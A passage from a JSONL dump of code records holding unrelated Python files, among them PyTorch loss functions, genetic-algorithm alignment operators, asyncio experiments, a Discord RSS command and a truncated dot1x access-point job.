'wb')\nfile3.write(str1.encode('utf-8'))\n\nfile3.close()\nprint(\"=====\")\nfile4 = open('test3.txt', 'rb')\n\nbyte = file4.read(3)\nwhile byte != b'':\n print(byte)\n print(byte.decode('UTF-8'))\n byte = file4.read(3)\n'''\n\n'''\ntest = \"happy birthday\"\ntest2 = test.find(\"y\", 3)\nprint(test2)\n\nc = \"What is real? How do you define real? \"\nprint(c.count(\"real\", 10))\n'''\n\n'''\nimport threading, time\n\nclass Thread (threading.Thread): # 繼承 Thread 類別\n def __init__(self, no, interval):\n threading.Thread.__init__(self)\n self.no = no\n self.interval = interval\n\n def run(self):\n global test1\n test1()\n time.sleep(self.interval)\n print('Thread '+str(self.no))\n\ndef test1():\n print(\"hi\")\n\nsource = \"test\"\n\ndef test():\n thread1 = Thread(1,5)\n thread2 = Thread(2,3)\n thread1.start()\n thread2.start()\n\nif __name__ == '__main__':\n test()\n'''\n\n'''\nimport os\nfor f in os.listdir(\"data/\"):\n print(type(f))\n'''\n\nstr1 = '請問Note 4 跟 iphone 6 plus那個好呢?\\n_1.txt'\n\ndef special_handle(str1):\n str1 = ''.join(str1.split('?'))\n str1 = ''.join(str1.split('\\\\'))\n str1 = ''.join(str1.split('/'))\n str1 = ''.join(str1.split(':'))\n str1 = ''.join(str1.split('|'))\n str1 = ''.join(str1.split('<'))\n str1 = ''.join(str1.split('>'))\n str1 = ''.join(str1.split('\"'))\n str1 = ''.join(str1.split('*'))\n str1 = ''.join(str1.split('\\n'))\n return str1\n\nstr1 = special_handle(str1)\nprint(type(str1))\nprint(str1)\n","sub_path":"Project/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":5770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"641875390","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nfrom utils.utils import *\nfrom torch.autograd import Variable\nimport numpy as np\n\nclass contrastive_loss(nn.Module):\n \"\"\"\n no-change,0\n change,1\n \"\"\"\n def __init__(self, margin1=0.1, margin2=2.0, eps=1e-6):\n super(contrastive_loss, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n\n def forward(self, x1, x2, label):\n diff = torch.abs(x1 - x2)\n dist_sq = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist = torch.sqrt(dist_sq)\n\n total = np.prod(label.size())\n refer = 1-label\n neg_dis = torch.clamp(dist - self.margin1, min=0.0)\n loss1 = refer * (neg_dis.pow(2))\n loss_1 = torch.sum(loss1)\n\n pos_dis = torch.clamp(self.margin2 - dist, min=0.0)\n loss2 = label * (pos_dis.pow(2)) * 10.0\n loss_2 = torch.sum(loss2)\n loss 
= (loss_1 + loss_2) / total\n return loss\n\nclass BCL_v2(nn.Module):\n \"\"\"\n batch-balanced contrastive loss\n no-change,0\n change,1\n \"\"\"\n def __init__(self, margin1=0.1, margin2=2.0, eps=1e-6):\n super(BCL_v2, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n\n def forward(self, x1, x2, label):\n diff = torch.abs(x1 - x2)\n dist_sq = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist = torch.sqrt(dist_sq)\n\n pos_num = torch.sum((label==1).float())+0.0001\n neg_num = torch.sum((label==0).float())+0.0001\n\n refer = 1-label\n neg_dis = torch.clamp(dist - self.margin1, min=0.0)\n loss1 = refer * (neg_dis.pow(2))\n loss_1 = torch.sum(loss1) /neg_num\n\n pos_dis = torch.clamp(self.margin2 - dist, min=0.0)\n loss2 = label * (pos_dis.pow(2))\n loss_2 = torch.sum(loss2) / pos_num\n loss = loss_1 + loss_2\n return loss\n\nclass BCLwithUncertainty_v1(nn.Module):\n def __init__(self, margin1=0.1, margin2=2.0, eps=1e-6, gamma=2):\n super(BCLwithUncertainty_v1, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n self.gamma = gamma\n self.avgpool = nn.AvgPool2d(kernel_size=3, stride=1, padding=1)\n\n def forward(self, x1, x2, label):\n diff = x1 - x2\n dist = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist_sq = torch.sqrt(dist)\n pos_num = torch.sum((label==1).float()) + 0.001\n neg_num = torch.sum((label==0).float()) + 0.001\n\n smooth_label = torch.pow(self.avgpool(label), self.gamma)\n smooth_refer = torch.pow((1-self.avgpool(label)), self.gamma)\n refer = 1 - label\n\n neg_dis = torch.clamp(dist_sq - self.margin1, min=0.0)\n loss_neg = (refer + smooth_refer) * neg_dis\n loss_1 = torch.sum(loss_neg) / neg_num\n\n pos_dis = torch.clamp(self.margin2 - dist_sq, min=0.0)\n loss_pos = (label + smooth_label) * pos_dis\n loss_2 = torch.sum(loss_pos) / pos_num\n loss_dis = loss_1 + loss_2\n return loss_dis\n\nclass BCLwithUncertainty_v2(nn.Module):\n def __init__(self, margin1=0.1, margin2=1.8, eps=1e-6):\n super(BCLwithUncertainty_v2, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n self.avgpool = nn.AvgPool2d(kernel_size=3, stride=1, padding=1)\n\n def forward(self, x1, x2, label):\n diff = x1 - x2\n dist = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist_sq = torch.sqrt(dist)\n pos_num = torch.sum((label==1).float()) + 0.001\n neg_num = torch.sum((label==0).float()) + 0.001\n\n x = self.avgpool(label)\n weight = 0.8 - 4 * torch.pow(x, 2) + 4 * x\n\n refer = 1 - label\n neg_dis = torch.clamp(dist_sq - self.margin1, min=0.0)\n loss_neg = refer * neg_dis * weight\n loss_1 = torch.sum(loss_neg) / neg_num\n\n pos_dis = torch.clamp(self.margin2 - dist_sq, min=0.0)\n loss_pos = label * pos_dis * weight\n loss_2 = torch.sum(loss_pos) / pos_num\n loss_dis = loss_1 + loss_2\n return loss_dis\n\ndef cross_entropy_2d(predict, target):\n \"\"\"\n Args:\n predict:(n, c, h, w)\n target:(n, h, w)\n \"\"\"\n assert predict.dim() == 4\n assert target.dim() == 3\n assert predict.size(0) == target.size(0)\n assert predict.size(2) == target.size(1)\n assert predict.size(3) == target.size(2)\n n, c, h, w = predict.size()\n target_mask = (target >= 0) * (target != 255)\n target = target[target_mask]\n if not target.data.dim():\n return Variable(torch.zeros(1))\n predict = predict.transpose(1,2).transpose(2,3).contiguous()\n predict = predict[target_mask.view(n, h, w, 1).repeat(1, 1, 1, c)].view(-1, c)\n loss = F.cross_entropy(predict, target, size_average=True)\n return loss\n\nclass IOUloss_v1(nn.Module):\n def 
__init__(self, margin1=0.1, margin2=2.0, eps=1e-6):\n super(IOUloss_v1, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n\n def forward(self, x1, x2, label):\n diff = x1 - x2\n dist = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist_sq = torch.sqrt(dist)\n\n predict = dist_sq[:,:,:]>1.0\n gt = label[:,:,:]==1.0\n\n insection = (predict & gt).float()\n union = (predict | gt).float()\n iou_loss = 1 - (torch.sum(insection) / (torch.sum(union)))\n\n return iou_loss\n\nclass IOUloss_v2(nn.Module):\n def __init__(self, eps=1e-6):\n super(IOUloss_v2, self).__init__()\n self.eps = eps\n\n def forward(self, output, label):\n _, predicted = torch.max(output.data, dim=1)\n\n predict = predicted[:,:,:]==1\n gt = label[:,:,:]==1.0\n\n insection = (predict & gt).float()\n union = (predict | gt).float()\n iou_loss = 1 - (torch.sum(insection) / (torch.sum(union)))\n return iou_loss\n","sub_path":"utils/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"482336502","text":"#!/usr/bin/env python\n# coding:utf-8\nimport base64\nfrom io import BytesIO\n\nimport qrcode as qrc\n\n\ndef qrcode(data, version=None, error_correction='M', box_size=4.5, border=2.5, fit=False):\n \"\"\"\n makes qr image using qrcode as qrc See documentation for qrcode package for info\n taken from: https://github.com/agnerio/Flask-QRcode/blob/master/flask_qrcode/__init__.py\n \"\"\"\n correction_levels = {\n 'L': qrc.constants.ERROR_CORRECT_L,\n 'M': qrc.constants.ERROR_CORRECT_M,\n 'Q': qrc.constants.ERROR_CORRECT_Q,\n 'H': qrc.constants.ERROR_CORRECT_H\n }\n\n qr = qrc.QRCode(\n version=version,\n error_correction=correction_levels[error_correction],\n box_size=box_size,\n border=border\n )\n qr.add_data(data)\n qr.make(fit=fit)\n\n # creates qrcode base64\n out = BytesIO()\n qr_img = qr.make_image()\n qr_img.save(out, 'PNG')\n\n return u\"data:image/png;base64,\" + base64.b64encode(out.getvalue()).decode('ascii')\n","sub_path":"10-two-factor-authentication/app/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"579099399","text":"from optparse import OptionParser\n\n\nclass CLIOptions(OptionParser):\n \"\"\"\n Command line interface options parser.\n \"\"\"\n def __init__(self, *args, **kwargs):\n OptionParser.__init__(self, *args, **kwargs)\n self.add_option(\n \"-c\", \"--config\", dest=\"configfile\",\n help=\"Configuration file.\", default=\"/etc/temboard/temboard.conf\")\n\n\nclass temboarduiOptions(CLIOptions):\n \"\"\"\n temboard options parser.\n \"\"\"\n def __init__(self, *args, **kwargs):\n CLIOptions.__init__(self, *args, **kwargs)\n self.add_option(\n \"-d\", \"--daemon\", dest=\"daemon\", action=\"store_true\",\n help=\"Run in background.\", default=False)\n self.add_option(\n \"-p\", \"--pid-file\", dest=\"pidfile\",\n help=\"PID file.\", default=\"/run/temboard.pid\")\n self.add_option(\n \"--debug\",\n action=\"store_true\", dest=\"debug\", default=False,\n help=\"Debug mode for development.\")\n","sub_path":"temboardui/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"437361378","text":"from random import randint\nfrom random import sample\nfrom Individual import Individual\n\n\n\"\"\"\nClasse de operadores do 
saga\n\"\"\"\nclass Operator():\n \"\"\"\n Construtor da classe operador, armazena os operadores em um dicionario, a fim de serem selecionados\n aleatoriamente pelos seus indices.\n \"\"\"\n def __init__(self):\n self.function_dict = {\n 1: self.crossover_one_point, # 2 parents\n 2: self.crossover_uniform, # 2 parents\n 3: self.block_shuffling_left, # 1 parents\n 4: self.block_shuffling_vertically, # 1 parents\n }\n self.selected_op = 0 # guarda a key do operador selecionado\n\n\n \"\"\"\n Seleciona de por meio da roleta um operador e retorna o numero de pais a serem selecionados\n \"\"\"\n def select_operator(self):\n dict_len = len(self.function_dict)\n\n # seleciona o operador aleatoriamente\n self.selected_op = randint(1,dict_len)\n # self.selected_op = 1\n\n # Verifica se o operator escolhido necessita de 1 parent\n if self.selected_op == 3 or self.selected_op == 4:\n return 1\n else:\n return 2\n\n\n \"\"\"\n Executa o operador selecionado, retornando os filhos gerados pelo operador\n \"\"\"\n def run_operator(self, parent1, parent2 = None):\n if parent2 is not None:\n self.function_dict[self.selected_op](parent1, parent2)\n else:\n self.function_dict[self.selected_op](parent1)\n\n\n \"\"\"\n Operador de crossover de um ponto, retorna os filhos do crossover\n \"\"\"\n def crossover_one_point(self, individual1, individual2):\n # print(\"Individual1 = %s\" % individual1.toString())\n # print(\"Individual2 = %s\\n\" % individual2.toString())\n chromosome1 = individual1.getChromosome()\n chromosome2 = individual2.getChromosome()\n \n num_seq = len(chromosome1)\n point = randint(1, len(chromosome1[0])-1) # ponto de corte\n\n # primeiro cromossomo\n part1_a = []\n part1_b = []\n\n # segundo cromossomo\n part2_a = []\n part2_b = []\n\n # divide o primeiro cromossomo\n for row in chromosome1:\n part1_a.append(row[0:point])\n part1_b.append(row[point::])\n\n num_char_a = []\n for row in part1_a:\n num_char_a.append(len(row) - row.count('-'))\n\n # Divide o segundo cromossomo\n for i, row in enumerate(chromosome2):\n cont = 0\n # print(\"num_char_a[i] = %d\\nrow %s\\n\" % (num_char_a[i], row))\n for j, char in enumerate(row):\n if char != '-':\n cont += 1\n if not num_char_a[i]:\n part2_a.append('')\n part2_b.append(row)\n elif cont == num_char_a[i]:\n part2_a.append(row[0:j+1])\n part2_b.append(row[j+1::])\n break\n \n # Encontra o tamnho da segunda sequencia lado A\n size_seq_A = 0\n for i in part2_a:\n size_seq_A = max(size_seq_A, len(i))\n\n # Encontra o tamnho da segunda sequencia lado B\n size_seq_B = 0\n for i in part2_b:\n size_seq_B = max(size_seq_B, len(i))\n\n # Ajusta o tamanho da segunda sequencia lado A\n for i in range(0, len(part2_a)):\n while len(part2_a[i]) < size_seq_A:\n part2_a[i] = part2_a[i] + '-'\n\n # Ajusta o tamanho da segunda sequencia lado B\n for i in range(0, len(part2_b)):\n while len(part2_b[i]) < size_seq_B:\n part2_b[i] = '-' + part2_b[i]\n\n # filhos a serem gerados\n child1 = []\n child2 = []\n\n # realiza a juncao dos cromossomos\n # print(\"part1_a %s\\npart1_b %s\" % (part1_a, part1_b))\n # print(\"part2_a %s\\npart2_b %s\\n\" % (part2_a, part2_b))\n for i in range(0, num_seq):\n child1.append(part1_a[i]+part2_b[i])\n child2.append(part2_a[i]+part1_b[i])\n\n # atribui os novos cromossomos aos individuos\n individual1.setChromosome(child1)\n individual2.setChromosome(child2)\n\n \"\"\"\n Operador de crossover uniforme, realiza o crossover uniforme entre dois cromossomos\n \"\"\"\n def crossover_uniform(self, individual1, individual2):\n # 
print(\"---------------OPERADOR CROSSOVER UNIFORME---------------\")\n chromosome1 = individual1.getChromosome()\n chromosome2 = individual2.getChromosome()\n position = []\n\n num_seq1 = len(chromosome1)\n # num_seq2 = len(chromosome2) (não esta sendo usada)\n\n # cromossomo dos filhos\n child1_chromosome = []\n child2_chromosome = []\n\n for x in range(0, num_seq1):\n tam_min = min(len(chromosome1[x]), len(chromosome2[x]))\n chrom1_size = len(chromosome1[x])\n chrom2_size = len(chromosome2[x])\n\n sequencia_chromosome1 = chromosome1[x]\n sequencia_chromosome2 = chromosome2[x]\n \n for y in range(0, tam_min):\n if sequencia_chromosome1[y] == sequencia_chromosome2[y]: #Condição para o mapeamento\n position.append(y) # Armazenar as posições que corresponde tanto ao pai1 como ao pai2\n # print(\"PAI 1: %s\" % sequencia_chromosome1)\n # print(\"PAI 2: %s\" % sequencia_chromosome2)\n # print('MAPEAMENTO: %s' % position)\n\n if len(position) < 2:\n return None\n x = sample(position, 2) \n\n # print (\"ESCOLHIDOS: %s\" % x)\n del position[:]\n child1_part1 = []\n child1_part2 = []\n child1_part3 = []\n child1_part4 = []\n child1_part5 = []\n \n child2_part1 = []\n child2_part2 = []\n child2_part3 = []\n child2_part4 = []\n child2_part5 = []\n\n menor_posicao = min(x[0], x[1])\n maior_posicao = max(x[0], x[1])\n\n # Para fazer a permutação dos pontos\n for y in range(0, chrom1_size):\n if y < menor_posicao:\n child1_part1.append(sequencia_chromosome1[y])\n if y == menor_posicao:\n child1_part2.append(sequencia_chromosome1[y])\n if y > menor_posicao and y < maior_posicao:\n child1_part3.append(sequencia_chromosome1[y])\n if y == maior_posicao:\n child1_part4.append(sequencia_chromosome1[y])\n if y > maior_posicao:\n child1_part5.append(sequencia_chromosome1[y])\n \n for y in range(0, chrom2_size):\n if y < menor_posicao:\n child2_part1.append(sequencia_chromosome2[y])\n if y == menor_posicao:\n child2_part2.append(sequencia_chromosome2[y])\n if y > menor_posicao and y < maior_posicao:\n child2_part3.append(sequencia_chromosome2[y])\n if y == maior_posicao:\n child2_part4.append(sequencia_chromosome2[y])\n if y > maior_posicao:\n child2_part5.append(sequencia_chromosome2[y])\n \n child1 = child1_part1+child1_part2+child2_part3+child1_part4+child1_part5\n child2 = child2_part1+child2_part2+child1_part3+child2_part4+child2_part5\n\n for y in range(0, len(child1)):\n if y == 0:\n teste = child1[y]\n else:\n teste += child1[y]\n # print(\"CHILD 1: %s\" % teste)\n child1_chromosome.append(teste)\n\n for y in range(0, len(child2)):\n if y == 0:\n teste = child2[y]\n else:\n teste += child2[y]\n # print(\"CHILD 2: %s\" % teste)\n # print(\"\\n\")\n child2_chromosome.append(teste)\n\n individual1.setChromosome(child1_chromosome)\n individual2.setChromosome(child2_chromosome)\n\n\n \"\"\"\n Implementação do operador block shuffling 1\n \"\"\"\n def block_shuffling_left(self, individual1):\n # Para o operador block shuffling mover um bloco cheio de lacunas uma posição para esquerda\n # print(\"-----------MOVER BLOCO DE LACUNAS PARA UMA POSIÇÃO NA ESQUERDA-----------\")\n sequence = individual1.getChromosome()\n amount_sequence = len(sequence)\n child_chromosome = []\n for x in range(0, amount_sequence):\n size_sequence = len(sequence[x]) \n child = []\n # var = \"\"\n # contador = 0\n for y in range(0, size_sequence): # Para identificar os gap e os mover\n if sequence[x][y] == \"-\":\n if y != 0:\n temp = child[len(child)-1] \n child.pop()\n child.append(sequence[x][y])\n child.append(temp)\n else:\n # 
contador = 1\n var = sequence[x][size_sequence-1]\n child.append(sequence[x][y])\n else:\n child.append(sequence[x][y])\n for y in range(0, len(child)):\n if y == 0:\n child_new = child[y]\n else:\n child_new += child[y]\n\n child_chromosome.append(child_new)\n # print(\"PAI: %s\" % sequence[x])\n # print(\"FILHO: %s\" % child_new)\n # print(\"\\n\")\n\n individual1.setChromosome(child_chromosome)\n\n\n \"\"\"\n Implementação do operador block shuffling 2\n \"\"\"\n def block_shuffling_vertically(self, individual1):\n # Para o operador block shuffling para dividir a metade um bloco de gaps e mover para esquerda\n # print(\"-----------VERTICAL GAPS-----------\")\n sequence = individual1.getChromosome()\n amount_sequence = len(sequence)\n contador1 = 0\n contador2 = 0\n child_chromosome = []\n for x in range(0, amount_sequence):\n \n size_sequence = len(sequence[x])\n child = []\n position = []\n for y in range(0, size_sequence):\n if sequence[x][y] == \"-\":\n position.append(y)\n contador1 += 1\n contador2 = 0\n else:\n contador2 = 1\n if contador1 > 1 and contador2 == 1:\n contador1 = 0\n contador2 = 0\n break\n \n if len(position) % 2 == 0:\n teste = len(position) / 2\n else:\n teste = len(position) / 2\n child = []\n temp = \"\"\n for y in range(0, size_sequence):\n if position == []:\n child.append(sequence[x][y])\n else:\n recebe = int(position[0]) + teste\n # print(\"CHILD: %s\" % child)\n if y == position[0]:\n if child != []:\n temp = child[len(child)-1]\n child.pop()\n \n if y == recebe:\n child.append(temp)\n child.append(sequence[x][y])\n else:\n child.append(sequence[x][y])\n \n for y in range(0, len(child)):\n if y == 0:\n child_new = child[y]\n else:\n child_new += child[y] \n del child\n #print(\"PAI:\\t%s\" % sequence[x]) \n #print(\"FILHO:\\t%s\" % child_new) \n #print(\"\\n\")\n child_chromosome.append(child_new)\n\n individual1.setChromosome(child_chromosome)","sub_path":"Operator.py","file_name":"Operator.py","file_ext":"py","file_size_in_byte":11963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"396323856","text":"from System.IO import *\n\nclass Feed:\n def __init__(self, Dir, NewsSourceName, RSSName, Module):\n self.Dir = Dir\n self.NewsSourceName = NewsSourceName\n self.RSSName = RSSName\n self.Module = Module\n\n def __str__(self):\n return self.Dir.FullName\n\ndef GetFeedsList():\n FeedsList = []\n for d in DirectoryInfo('Feeds').GetDirectories():\n NewsSourceName = d.Name\n for RSSdir in d.GetDirectories():\n for f in RSSdir.GetFiles():\n if f.Name.endswith('.rb') or f.Name.endswith('.py'):\n FeedsList.append(Feed(RSSdir, NewsSourceName, f.FullName.split('.')[0], f.FullName))\n return FeedsList\n\n##def GetFeedsList():\n## FeedsList = []\n## for d in DirectoryInfo('Feeds').GetDirectories():\n## NewsSourceName = ''\n## for f in d.GetFiles():\n## if f.FullName.endswith('.xml'):\n## NewsSourceName = GetNewsSourceName(f.FullName)\n## for RSSdir in d.GetDirectories():\n## RSSName = ''\n## for f in RSSdir.GetFiles():\n## if f.FullName.endswith('.xml'):\n## RSSName = GetRSSName(f.FullName)\n## FeedsList.append(Feed(NewsSourceName, RSSName, GetRSSModule(RSSdir.FullName)))\n## \n## return FeedsList\n##\n##def GetNewsSourceName(f):\n## with open(f) as f:\n## pass\n##\n##def GetRSSName(f):\n## pass\n##\n##def GetRSSModule(f):\n## pass\n","sub_path":"Feed.py","file_name":"Feed.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"37195516","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float32\n\ndef callback(data):\n rospy.loginfo(rospy.get_caller_id() + \" I heard %s\", data.data)\n\ndef reader():\n\n\trospy.init_node('reader', anonymous=True)\n\n\trospy.Subscriber(\"convo\",Float32, callback)\n\t\n\trospy.spin()\n\t\nif __name__== '__main__':\n\treader()\n","sub_path":"scripts/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643882083","text":"'''\r\n连续变量进行对数转换\r\n'''\r\nfrom util import dataset\r\nfrom scipy import stats\r\n\r\nprint('Loading data......')\r\ntrain = dataset.load('numeric', 'train').astype(float)\r\ntest = dataset.load('numeric', 'test').astype(float)\r\nnum_col = dataset.load('numeric', 'feature')\r\n\r\nfor col in num_col:\r\n if stats.skew(train[col]) > 0.25:\r\n values, lam = stats.boxcox(train[col].values+1)\r\n train[col] = values\r\n print(col)\r\n\r\n if stats.skew(test[col]) > 0.25:\r\n values, lam = stats.boxcox(test[col].values+1)\r\n test[col] = values\r\n\r\nprint(train.head())\r\nprint('='*20)\r\nprint(test.head())\r\nprint('='*20)\r\n\r\nprint('Saving data......')\r\ndataset(numeric_boxcox=train).save('train')\r\ndataset(numeric_boxcox=test).save('test')\r\n\r\nprint('Done!')\r\n","sub_path":"02Loan_Prediction/preprocessing/numeric-boxcox.py","file_name":"numeric-boxcox.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"516668564","text":"import asyncio\nimport random\n\n\nasync def add(start, end, wait):\n sum = 0\n for n in range(start, end):\n sum += n\n await asyncio.sleep(wait)\n print(f'Sum from {start} to {end} is {sum}')\n\n\nasync def main():\n task1 = asyncio.create_task(add(1, 10000001, 0))\n task2 = asyncio.create_task(add(2, 102, 2))\n task3 = asyncio.create_task(add(3, 10, 1))\n await asyncio.wait([task1, task2, task3])\n\n\nasync def slow_func():\n await asyncio.sleep(1)\n return 'answer'\n\n\nasync def failed_func():\n print('failed')\n await asyncio.sleep(2)\n raise Exception\n\n\nasync def test():\n response = slow_func()\n print(response)\n try:\n await failed_func()\n except Exception as e:\n print(e, await response)\n\n\nasync def say(what, when):\n await asyncio.sleep(when)\n print(what)\n\n\nasync def stop_after(loop, when):\n await asyncio.sleep(when)\n loop.stop()\n\n\nasync def long_say():\n index = 0\n while True:\n await say(f'{index}: hello', when=0.1)\n index += 1\n\n\nasync def print_every_second():\n while True:\n for i in range(60):\n print(f'{i}s')\n await asyncio.sleep(1)\n\n\nasync def print_every_minute():\n for i in range(1, 10):\n await asyncio.sleep(60)\n print(f'{i}min')\n\n\ndef time_runner():\n loop = asyncio.get_event_loop()\n loop.run_until_complete(\n asyncio.gather(print_every_second(), print_every_minute())\n )\n loop.close()\n\n\nasync def read():\n index = -1\n while True:\n index += 1\n print(f'reading: {index}')\n await asyncio.sleep(0.5)\n print(f'finished reading {index}')\n yield index\n\n\nasync def db_write(index):\n print(f'saving {index}')\n await asyncio.sleep(3)\n print(f'finished saving {index}')\n\n\nasync def rw_runner():\n async for item in read():\n await db_write(item)\n\n\ndef say_runner():\n loop = asyncio.get_event_loop()\n loop.run_until_complete(say('hello_world', 1))\n loop.close()\n\n\ndef say_runner_multiple():\n 
loop = asyncio.get_event_loop()\n    loop.create_task(say('first hello', 2))\n    loop.create_task(say('second hello', 1))\n    loop.run_forever()\n    loop.close()\n\n\ndef say_runner_long():\n    loop = asyncio.get_event_loop()\n    # loop.run_until_complete(long_say())\n    loop.create_task(say('2 hello_world', 2))\n    loop.create_task(long_say())\n    loop.create_task(say('1 hello_world', 1))\n    loop.run_forever()\n    loop.close()\n\n\ndef say_stop_runner():\n    loop = asyncio.get_event_loop()\n\n    loop.create_task(say('first_hello', 2))\n    loop.create_task(say('second_hello', 1))\n    loop.create_task(say('third_hello', 4))\n    loop.create_task(stop_after(loop, 3))\n\n    loop.run_forever()\n    loop.close()\n\n\nif __name__ == '__main__':\n    pass\n","sub_path":"reader/async_test.py","file_name":"async_test.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"190867339","text":"# -*- coding: utf-8 -*-\n# author:xls\n\"\"\"\n    Generate a random 4-character verification code containing uppercase letters A-Z and digits 0-9\n\"\"\"\nimport random\ncheck_code = ''\nfor i in range(4):\n    current = random.randrange(4)\n    if current == i:\n        # generate a random integer\n        temp = random.randrange(10)\n    else:\n        # generate a random uppercase letter\n        temp = chr(random.randrange(65, 91))\n    check_code += str(temp)\nprint(check_code)","sub_path":"grammar/random_demo.py","file_name":"random_demo.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"328355305","text":"__all__ = ['add', 'dump', 'get', 'import', 'join', 'list', 'refresh', 'remove', 'removeall', 'setdate']\n\nfrom importlib import import_module\nfrom discord import Client, Message\n\nSHORT_HELP_TEXT = '$$$rss [...] - Generate RSS feeds (includes subcommands)'\n\ndef get_subcommand(name: str):\n    \"\"\"\n    Select subcommand\n    \"\"\"\n    return import_module('.' 
+ name, 'hooks.commands.rss')\n\ndef get_subcommand_short_help(name: str) -> str:\n    \"\"\"\n    Show subcommand help\n    \"\"\"\n    return get_subcommand(name).SHORT_HELP_TEXT\n\ndef get_subcommand_long_help(name: str, **kwargs) -> str:\n    \"\"\"\n    Show subcommand long help\n    \"\"\"\n    return get_subcommand(name).help(**kwargs)\n\ndef help(**kwargs):\n    \"\"\"\n    Show help\n    \"\"\"\n    if not kwargs['args']:\n        return str.join('\\n', map(get_subcommand_short_help, __all__))\n    else:\n        name = kwargs['args'][0]\n        kwargs['args'] = kwargs['args'][1:]\n        return get_subcommand_long_help(name, **kwargs)\n\nasync def run(client: Client, message: Message = None, **kwargs):\n    \"\"\"\n    Run command\n    \"\"\"\n    args = kwargs.get('args', [])\n    if not args or args[0] == '':\n        command = 'refresh'\n    else:\n        command = args[0]\n    kwargs['args'] = args[1:]\n\n    if command in __all__:\n        command_module = get_subcommand(command)\n        return await command_module.run(client, message, **kwargs)\n    else:\n        raise NotImplementedError('$$$rss {}'.format(command))\n","sub_path":"hooks/commands/rss/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"21688844","text":"from django.shortcuts import render\n\nfrom .models import Section, Navigation\n\n# Create your views here.\ndef index(request):\n    section_list = Section.objects.all()\n    navigation_list = Navigation.objects.all()\n\n    context = {\n        'section_list': section_list,\n        'navigation_list': navigation_list,\n    }\n\n    return render(request, 'home/index.html', context)\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"171668668","text":"from datetime import timedelta\n# third-party modules\n# our own modules\nfrom . import MetaClass\nfrom framework.database import DbOperation\nfrom utils.time import Datetime\nfrom utils.decorators import promise_do_once\nfrom settings import log\n\n\nclass IllegalDot1xUserJob(metaclass=MetaClass):\n    next_time = Datetime.localtime()\n\n    @classmethod\n    def start(cls, force=False):\n        now = Datetime.localtime()\n        if not force and now < cls.next_time:\n            return\n        # next run: 7:00 every morning\n        cls.next_time = (now + timedelta(days=1)).replace(hour=7, minute=0, second=0, microsecond=0)\n        #\n        start_time = Datetime.localtime().replace(hour=0, minute=0, second=0, microsecond=0)\n        end_time = start_time - timedelta(days=1)\n        cls.doing(start_time=start_time, end_time=end_time)\n\n    @classmethod\n    @promise_do_once(file_name=__file__, func_name='doing')\n    def doing(cls, start_time, end_time):\n        # all public APs\n        public_ap = set()\n        owner_ap = dict()\n        sql = f\"\"\"\n            SELECT * FROM ap_owner\n        \"\"\"\n        for row in DbOperation.select(sql):\n            username = row['username']\n            ap_mac = row['ap_mac']\n            is_public = row['is_public']\n            if is_public:\n                public_ap.add(ap_mac)\n            else:\n                if username not in owner_ap:\n                    owner_ap[username] = set()\n                owner_ap[username].add(ap_mac)\n\n        # 按username统计连接最多的AP, 作为用户绑定的常用AP. 
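\n        # (i.e. bind each user to the AP they connect to most often, excluding public APs)\n        # 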
